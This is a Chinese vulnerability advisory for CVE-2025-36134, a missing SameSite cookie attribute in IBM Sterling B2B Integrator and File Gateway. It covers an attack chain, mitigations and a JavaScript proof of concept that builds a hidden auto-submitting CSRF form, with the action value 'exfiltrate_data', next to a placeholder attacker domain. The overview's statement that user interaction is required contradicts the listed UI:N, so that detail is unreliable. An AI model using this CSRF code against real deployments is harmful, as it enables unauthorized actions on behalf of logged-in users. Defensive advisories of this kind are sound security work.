IPBUF安全漏洞报告
English
CVE-2025-36134 CVSS 3.7 低危

CVE-2025-36134 IBM Sterling B2B SameSite Cookie配置缺失漏洞

披露日期: 2025-11-25
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-36134
漏洞类型
SameSite Cookie配置错误
CVSS评分
3.7 低危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
IBM Sterling B2B Integrator, IBM Sterling File Gateway

相关标签

SameSite Cookie敏感信息泄露跨站请求伪造CSRFIBM Sterling B2B IntegratorIBM Sterling File GatewayCookie配置错误认证绕过会话管理

漏洞概述

CVE-2025-36134是IBM Sterling B2B Integrator和IBM Sterling File Gateway产品中存在的一个安全漏洞。该漏洞源于敏感Cookie缺少或配置不当的SameSite属性,可能导致敏感信息泄露。在Web安全机制中,SameSite属性是防止跨站请求伪造(CSRF)攻击的重要安全机制。当Cookie未设置SameSite属性或设置为不安全的值时,攻击者可以通过跨站请求窃取用户的认证信息,进而冒充合法用户执行操作。攻击者可以构造恶意页面或链接,诱导已登录用户访问,利用浏览器自动发送Cookie的特性,在用户不知情的情况下向目标站点发起请求,获取敏感数据或执行未授权操作。由于该漏洞的CVSS评分为3.7(低危),且攻击复杂度较高,需要用户交互配合,因此实际利用风险相对较低,但仍建议及时修复以提升整体安全防护水平。

技术细节

该漏洞的根本原因是IBM Sterling B2B Integrator和IBM Sterling File Gateway在创建敏感认证Cookie时,未正确设置SameSite属性或将其设置为不安全的值(如None或未设置)。SameSite属性有三个可选值:Strict(严格,仅同站点请求发送Cookie)、Lax(宽松,仅导航请求发送Cookie)和None(无限制,需配合Secure属性使用)。当敏感Cookie缺少SameSite属性时,浏览器默认行为可能导致Cookie在跨站请求中被发送。攻击者可以构造包含目标站点的恶意HTML页面或链接,通过钓鱼邮件、社交工程等方式诱导已登录用户访问。当用户访问恶意页面时,浏览器会自动向目标站点发起跨站请求,并携带有效的认证Cookie。攻击者可以通过JavaScript或HTML元素(如img、script、form等)触发请求,利用用户的认证状态执行未授权操作或获取敏感信息。由于CVSS向量显示攻击复杂度高(AC:H),且需要网络访问权限(AV:N),实际利用需要满足特定条件。

攻击链分析

STEP 1
步骤1:信息收集
攻击者识别目标IBM Sterling B2B Integrator或Sterling File Gateway实例,并确认其版本是否在受影响范围内(6.0.0.0-6.1.2.7、6.2.0.0-6.2.0.5、6.2.1.1)
STEP 2
步骤2:构造恶意内容
攻击者创建包含恶意HTML/JavaScript的页面,该页面会向目标站点发起跨站请求,可以是自动提交的表单、图片标签或fetch/XHR请求
STEP 3
步骤3:诱导受害者访问
通过钓鱼邮件、社交媒体链接、恶意网站等渠道,诱导已登录目标系统的用户访问攻击者控制的恶意页面
STEP 4
步骤4:触发跨站请求
当受害者访问恶意页面时,浏览器会自动向目标站点发起跨站请求,并携带有效的认证Cookie(因为SameSite属性缺失或配置不当)
STEP 5
步骤5:窃取敏感信息或执行未授权操作
攻击者利用窃取的认证信息执行未授权操作,如获取敏感业务数据、修改配置或冒充合法用户进行交易

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// CVE-2025-36134 SameSite Cookie Missing PoC // This PoC demonstrates how an attacker could exploit the missing SameSite attribute const targetUrl = 'https://vulnerable-ibm-sterling-instance.com'; const attackerDomain = 'https://attacker-controlled-site.com'; // Check if SameSite attribute is missing or insecure async function checkCookieSecurity() { const response = await fetch(targetUrl, { credentials: 'include', mode: 'cors' }); const cookies = response.headers.getSetCookie(); console.log('Cookies received from target:'); cookies.forEach(cookie => { console.log(cookie); // Check if SameSite attribute is present if (!cookie.toLowerCase().includes('samesite')) { console.log('[VULNERABLE] SameSite attribute is missing!'); } else if (cookie.toLowerCase().includes('samesite=none')) { console.log('[WARNING] SameSite=None requires Secure attribute'); } }); } // Simulate CSRF attack via cross-site request function exploitMissingSameSite() { // Create an invisible form for CSRF attack const form = document.createElement('form'); form.action = targetUrl + '/api/sensitive-endpoint'; form.method = 'POST'; form.target = '_blank'; form.style.display = 'none'; const input = document.createElement('input'); input.type = 'hidden'; input.name = 'action'; input.value = 'exfiltrate_data'; form.appendChild(input); document.body.appendChild(form); form.submit(); console.log('[ATTACK] CSRF request sent via cross-site form submission'); } // Execute PoC checkCookieSecurity(); // Note: This PoC requires the victim to be logged into the target application // and visit the attacker's page while authenticated. /* Mitigation: 1. Set SameSite=Strict or SameSite=Lax for all sensitive cookies 2. If SameSite=None is required, ensure Secure attribute is also set 3. Implement CSRF tokens as additional protection 4. Apply security headers (Content-Security-Policy, X-Frame-Options) */

影响范围

IBM Sterling B2B Integrator 6.0.0.0 - 6.1.2.7
IBM Sterling File Gateway 6.0.0.0 - 6.1.2.7
IBM Sterling B2B Integrator 6.2.0.0 - 6.2.0.5
IBM Sterling File Gateway 6.2.0.0 - 6.2.0.5
IBM Sterling B2B Integrator 6.2.1.1
IBM Sterling File Gateway 6.2.1.1

防御指南

临时缓解措施
作为临时缓解措施,可以在前端代理或负载均衡器(如Nginx、Apache HTTP Server)中配置响应头,为所有来自IBM Sterling应用的Cookie添加SameSite属性。同时,建议审查应用程序的会话管理配置,确保认证Cookie设置了适当的生命周期和过期时间。对于必须支持跨站场景的功能,可以考虑使用独立的认证机制替代Cookie认证,或实施额外的请求来源验证(如Referer检查、Origin验证),但这些措施仅为临时方案,最终仍需通过官方补丁进行根本修复。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表